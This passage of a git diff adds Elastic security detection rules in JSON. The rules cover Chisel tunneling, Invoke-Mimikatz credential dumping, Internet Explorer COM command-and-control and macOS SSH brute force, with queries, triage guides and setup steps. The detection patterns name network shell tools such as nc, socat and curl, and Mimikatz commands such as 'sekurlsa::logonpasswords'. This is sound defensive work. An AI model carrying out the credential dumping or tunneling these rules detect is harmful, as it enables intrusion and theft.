pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n\n### Related rules\n\n- Potential Protocol Tunneling via Chisel Client - 3f12325a-4cc6-410b-8d4c-9fbbeb744cfd\n- Potential Linux Tunneling and/or Port Forwarding - 6ee947e9-de7e-4281-a55d-09289bdf947e\n- Potential Protocol Tunneling via EarthWorm - 9f1c4ca3-44b5-481d-ba42-32dc215a2769\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator or developer who uses port tunneling for benign purposes, consider adding exceptions for specific user accounts or hosts. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors, such as reverse shells, reverse proxies, or droppers, that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by host.id, process.entity_id with maxspan=1m\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \n process.args == \"server\" and process.args in (\"--port\", \"-p\", \"--reverse\", \"--backend\", \"--socks5\") and \n process.args_count >= 3 and process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [network where host.os.type == \"linux\" and event.action == \"connection_accepted\" and event.type == \"start\" and \n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" and \n not process.name : (\n \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\",\n \"ftp\", \"socat\", \"curl\", \"wget\", \"dpkg\", \"docker\", \"dockerd\", \"yum\", \"apt\", \"rpm\", \"dnf\", \"ssh\", \"sshd\", \"hugo\")]\n", + "references": [ + "https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform", + "https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ac8805f6-1e08-406c-962e-3937057fa86f", + "setup": "This rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + } + ], + "type": "eql", + "version": 5 + }, + "id": "ac8805f6-1e08-406c-962e-3937057fa86f_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_6.json b/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_6.json new file mode 100644 index 00000000000..9871c6c9155 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_6.json @@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for common command line flags leveraged by the Chisel server utility followed by a received connection within a timespan of 1 minute. Chisel is a command-line utility used for creating and managing TCP and UDP tunnels, enabling port forwarding and secure communication between machines. Attackers can abuse the Chisel utility to establish covert communication channels, bypass network restrictions, and carry out malicious activities by creating tunnels that allow unauthorized access to internal systems.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Protocol Tunneling via Chisel Server", + "note": "## Triage and analysis\n\n### Investigating Potential Protocol Tunneling via Chisel Server\n\nAttackers can leverage `chisel` to clandestinely tunnel network communications and evade security measures, potentially gaining unauthorized access to sensitive systems.\n\nThis rule looks for a sequence of command line arguments that are consistent with `chisel` server tunneling behavior, followed by a network event by an uncommon process. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Identify any signs of suspicious network activity or anomalies that may indicate protocol tunneling. This could include unexpected traffic patterns or unusual network behavior.\n - Investigate listening ports and open sockets to look for potential protocol tunneling, reverse shells, or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n\n### Related rules\n\n- Potential Protocol Tunneling via Chisel Client - 3f12325a-4cc6-410b-8d4c-9fbbeb744cfd\n- Potential Linux Tunneling and/or Port Forwarding - 6ee947e9-de7e-4281-a55d-09289bdf947e\n- Potential Protocol Tunneling via EarthWorm - 9f1c4ca3-44b5-481d-ba42-32dc215a2769\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator or developer who uses port tunneling for benign purposes, consider adding exceptions for specific user accounts or hosts. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors, such as reverse shells, reverse proxies, or droppers, that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by host.id, process.entity_id with maxspan=1m\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \n process.args == \"server\" and process.args in (\"--port\", \"-p\", \"--reverse\", \"--backend\", \"--socks5\") and \n process.args_count >= 3 and process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [network where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"connection_accepted\" and \n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" and \n not process.name : (\n \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\",\n \"ftp\", \"socat\", \"curl\", \"wget\", \"dpkg\", \"docker\", \"dockerd\", \"yum\", \"apt\", \"rpm\", \"dnf\", \"ssh\", \"sshd\", \"hugo\")]\n", + "references": [ + "https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform", + "https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ac8805f6-1e08-406c-962e-3937057fa86f", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + } + ], + "type": "eql", + "version": 6 + }, + "id": "ac8805f6-1e08-406c-962e-3937057fa86f_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ac96ceb8-4399-4191-af1d-4feeac1f1f46_108.json b/packages/security_detection_engine/kibana/security_rule/ac96ceb8-4399-4191-af1d-4feeac1f1f46_108.json new file mode 100644 index 00000000000..9150ebb15f9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ac96ceb8-4399-4191-af1d-4feeac1f1f46_108.json @@ -0,0 +1,87 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. This rule detects Invoke-Mimikatz PowerShell script and alike.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Invoke-Mimikatz PowerShell Script", + "note": "## Triage and analysis\n\n### Investigating Mimikatz PowerShell Activity\n\n[Mimikatz](https://github.com/gentilkiwi/mimikatz) is an open-source tool used to collect, decrypt, and/or use cached credentials. This tool is commonly abused by adversaries during the post-compromise stage where adversaries have gained an initial foothold on an endpoint and are looking to elevate privileges and seek out additional authentication objects such as tokens/hashes/credentials that can then be used to move laterally and pivot across a network.\n\nThis rule looks for PowerShell scripts that load mimikatz in memory, like Invoke-Mimikataz, which are used to dump credentials from the Local Security Authority Subsystem Service (LSASS). Any activity triggered from this rule should be treated with high priority as it typically represents an active adversary.\n\nMore information about Mimikatz components and how to detect/prevent them can be found on [ADSecurity](https://adsecurity.org/?page_id=1821).\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Invoke-Mimitakz and alike scripts heavily use other capabilities covered by other detections described in the \"Related Rules\" section.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host.\n - Examine network and security events in the environment to identify potential lateral movement using compromised credentials.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Mimikatz Memssp Log File Detected - ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6\n- Modification of WDigest Security Provider - d703a5af-d5b0-43bd-8ddb-7a5d500b7da5\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Validate that cleartext passwords are disabled in memory for use with `WDigest`.\n- Look into preventing access to `LSASS` using capabilities such as LSA protection or antivirus/EDR tools that provide this capability.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\npowershell.file.script_block_text:(\n (DumpCreds and\n DumpCerts) or\n \"sekurlsa::logonpasswords\" or\n (\"crypto::certificates\" and\n \"CERT_SYSTEM_STORE_LOCAL_MACHINE\")\n)\n", + "references": [ + "https://attack.mitre.org/software/S0002/", + "https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1", + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], + "risk_score": 73, + "rule_id": "ac96ceb8-4399-4191-af1d-4feeac1f1f46", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 108 + }, + "id": "ac96ceb8-4399-4191-af1d-4feeac1f1f46_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/acd611f3-2b93-47b3-a0a3-7723bcc46f6d_105.json b/packages/security_detection_engine/kibana/security_rule/acd611f3-2b93-47b3-a0a3-7723bcc46f6d_105.json new file mode 100644 index 00000000000..64fd29575c7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/acd611f3-2b93-47b3-a0a3-7723bcc46f6d_105.json @@ -0,0 +1,130 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances of Internet Explorer (iexplore.exe) being started via the Component Object Model (COM) making unusual network connections. Adversaries could abuse Internet Explorer via COM to avoid suspicious processes making network connections and bypass host-based firewall restrictions.", + "false_positives": [ + "Processes such as MS Office using IEproxy to render HTML content." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Command and Control via Internet Explorer", + "query": "sequence by host.id, user.name with maxspan = 5s\n [library where host.os.type == \"windows\" and dll.name : \"IEProxy.dll\" and process.name : (\"rundll32.exe\", \"regsvr32.exe\")]\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"iexplore.exe\" and process.parent.args : \"-Embedding\"]\n /* IE started via COM in normal conditions makes few connections, mainly to Microsoft and OCSP related domains, add FPs here */\n [network where host.os.type == \"windows\" and network.protocol == \"dns\" and process.name : \"iexplore.exe\" and\n not dns.question.name :\n (\n \"*.microsoft.com\",\n \"*.digicert.com\",\n \"*.msocsp.com\",\n \"*.windowsupdate.com\",\n \"*.bing.com\",\n \"*.identrust.com\",\n \"*.sharepoint.com\",\n \"*.office365.com\",\n \"*.office.com\"\n )\n ] /* with runs=5 */\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "acd611f3-2b93-47b3-a0a3-7723bcc46f6d", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1559", + "name": "Inter-Process Communication", + "reference": "https://attack.mitre.org/techniques/T1559/", + "subtechnique": [ + { + "id": "T1559.001", + "name": "Component Object Model", + "reference": "https://attack.mitre.org/techniques/T1559/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 105 + }, + "id": "acd611f3-2b93-47b3-a0a3-7723bcc46f6d_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_108.json b/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_108.json new file mode 100644 index 00000000000..d345cfb6e71 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_108.json @@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a high number (20) of macOS SSH KeyGen process executions from the same host. An adversary may attempt a brute force attack to obtain unauthorized access to user accounts.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential macOS SSH Brute Force Detected", + "query": "event.category:process and host.os.type:macos and event.type:start and process.name:\"sshd-keygen-wrapper\" and process.parent.name:launchd\n", + "references": [ + "https://themittenmac.com/detecting-ssh-activity-via-process-monitoring/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ace1e989-a541-44df-93a8-a8b0591b63c0", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/" + } + ] + } + ], + "threshold": { + "field": [ + "host.id" + ], + "value": 20 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 108 + }, + "id": "ace1e989-a541-44df-93a8-a8b0591b63c0_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_108.json b/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_108.json new file mode 100644 index 00000000000..14d81e8f186 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_108.json @@ -0,0 +1,81 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious managed code hosting process which could indicate code injection or other form of suspicious code execution.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Managed Code Hosting 